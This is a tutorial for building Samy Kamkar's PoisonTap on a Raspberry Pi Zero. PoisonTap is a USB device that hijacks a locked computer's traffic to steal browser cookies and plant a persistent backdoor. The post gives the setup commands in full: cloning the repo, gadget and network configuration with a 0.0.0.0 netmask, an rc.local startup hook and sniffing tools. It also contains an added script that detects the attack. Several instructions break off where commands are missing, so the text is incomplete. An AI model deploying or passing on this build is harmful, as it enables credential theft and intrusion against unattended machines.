PoisonTap on Raspberry Pi Zero
Today we are going to look at how to install Samy Kamkar's PoisonTap on the Raspberry Pi Zero. PoisonTap is an exploit designed to bypass locked, password-protected computers over USB, siphon cookies out of the browser and install a persistent back-door.
How it works:
When PoisonTap is plugged into a locked computer it emulates an Ethernet-over-USB device. The host brings the new interface up and asks for a DHCP lease, and PoisonTap answers with a crafted offer whose netmask is 0.0.0.0, i.e. a subnet that covers the entire IPv4 address space. The host now believes every IPv4 address is directly reachable on the PoisonTap link, so it passes all of its network traffic through the device even though its Wi-Fi or wired connection is still up and still holds the default gateway.
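As an added check that is not part of the original post: on a Linux host the lease described above leaves two tell-tale marks, a default route with no gateway (the kernel prints it as `default dev usb0 ... scope link`, with no `via`) and an interface address with a /0 prefix. The shell functions below flag both. They are run here over constructed `ip -4 route show` / `ip -4 addr show` text written in the format those commands print; the lines are made up for this example, not captured from a real machine.

```shell
#!/bin/sh
# Added example: detect a PoisonTap-style "/0 lease" on a Linux host.
# The route and address tables below are constructed sample text in the
# format printed by "ip -4 route show" and "ip -4 addr show"; they are
# not captured from a real machine.

CLEAN_ROUTES='default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600'

# After a PoisonTap lease: the host got 1.0.0.2 with netmask 0.0.0.0, so the
# kernel installed a default route that is "connected" (no "via" gateway),
# i.e. every IPv4 address is treated as a neighbour on usb0.
POISONED_ROUTES='default via 192.168.1.1 dev wlan0 proto dhcp metric 600
default dev usb0 proto kernel scope link src 1.0.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600'

CLEAN_ADDRS='inet 192.168.1.23/24 brd 192.168.1.255 scope global dynamic wlan0'
POISONED_ADDRS='inet 192.168.1.23/24 brd 192.168.1.255 scope global dynamic wlan0
inet 1.0.0.2/0 brd 255.255.255.255 scope global usb0'

# flag_onlink_default ROUTES: print every default (0.0.0.0/0) route that has
# no "via" gateway; exit 0 if at least one was found, 1 otherwise.
flag_onlink_default() {
    printf '%s\n' "$1" | awk '
        $1 == "default" || $1 == "0.0.0.0/0" {
            via = 0
            for (i = 2; i <= NF; i++) if ($i == "via") via = 1
            if (!via) { print "  on-link default route: " $0; found = 1 }
        }
        END { if (found) exit 0; exit 1 }'
}

# flag_zero_prefix_addr ADDRS: print every IPv4 address whose prefix length
# is /0; exit 0 if at least one was found, 1 otherwise.
flag_zero_prefix_addr() {
    printf '%s\n' "$1" | awk '
        $1 == "inet" && $2 ~ "/0$" { print "  /0 address: " $0; found = 1 }
        END { if (found) exit 0; exit 1 }'
}

# host_looks_poisoned ROUTES ADDRS: exit 0 when either check fires.
host_looks_poisoned() {
    r=1
    flag_onlink_default "$1" && r=0
    flag_zero_prefix_addr "$2" && r=0
    return $r
}

echo "clean host:"
host_looks_poisoned "$CLEAN_ROUTES" "$CLEAN_ADDRS" || echo "  nothing suspicious"
echo "poisoned host:"
host_looks_poisoned "$POISONED_ROUTES" "$POISONED_ADDRS" || echo "  nothing suspicious"
```

On a live Linux machine call `host_looks_poisoned "$(ip -4 route show)" "$(ip -4 addr show)"`. Windows and macOS print their tables differently, but the property to look for is the same: a default route with no gateway, or an interface whose netmask is 0.0.0.0.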
Installing an OS on your Pi:
The first thing we are going to do is install an operating system on your Raspberry Pi Zero. I'll be using Raspbian Jessie (recommended), although plenty of other distributions work too.
Download Raspbian Jessie Lite from the Raspberry Pi website and save the .img file somewhere safe. Now for burning the image onto your SD card. The process is the same on every operating system, just with a different program. These are the programs I would recommend:
MacOS: Apple Pi Baker
Windows: Win32 Disk Imager
Linux: dd from the command line (pre-installed)
Let the image burn onto the SD card and, when it's finished, move on to the next section to make the changes to the boot partition.
Configuring the boot partition
By default, Raspbian disables some of the features we need to get into the Pi over USB. First we are going to add the following line to the end of
This allows the USB gadget modules to be loaded on the Raspberry Pi itself. Now we need to actually load those modules. Add the following code segment after
Finally, as of late 2016, Raspbian disables SSH by default, so we need to re-enable it. To do this, simply create an empty file called ssh (no extension) in the boot partition, i.e. /boot/ssh. The file needs no contents; it simply has to exist.
SSH into the Raspberry Pi
Next we need to gain control of the Pi over SSH. Plug the Raspberry Pi into your computer over USB, making sure you use the port labelled USB, not PWR! This is essential, since the power-only micro-USB port carries no data. Open up your terminal and type the following:
When prompted for a password, type raspberry. These are the default credentials (user pi, password raspberry) for the Raspberry Pi, and anyone on the same network can guess them, so change them as soon as you can by typing
If you are not using the Lite version of Raspbian, you can skip this step. The Lite version doesn't ship with git installed, so we need to install it:
sudo apt-get install git
Next we need to clone Samy Kamkar's repository onto the Pi. We can do this with the following command:
git clone https://github.com/samyk/poisontap.git
Now change directory into the new folder named
Now we can run a simple set of setup commands that do all the dirty work: configuring the USB gadget, the usb0 network interface and the files that run on boot. They write to /boot and /etc and call apt-get, so run them as root (sudo -i first) from inside the poisontap directory:
echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs
The last thing we need to do to get PoisonTap up and running is to move the project's DHCP configuration file into place. Run this from inside the poisontap directory, which is where dhcpd.conf lives:
sudo mv dhcpd.conf /etc/dhcp/dhcpd.conf
You should now have an up and running PoisonTap device!
One thing to note: if your PoisonTap device is not showing up on the host as an Ethernet device as it should, you can change the VID and PID in pi_startup.sh and give it another shot!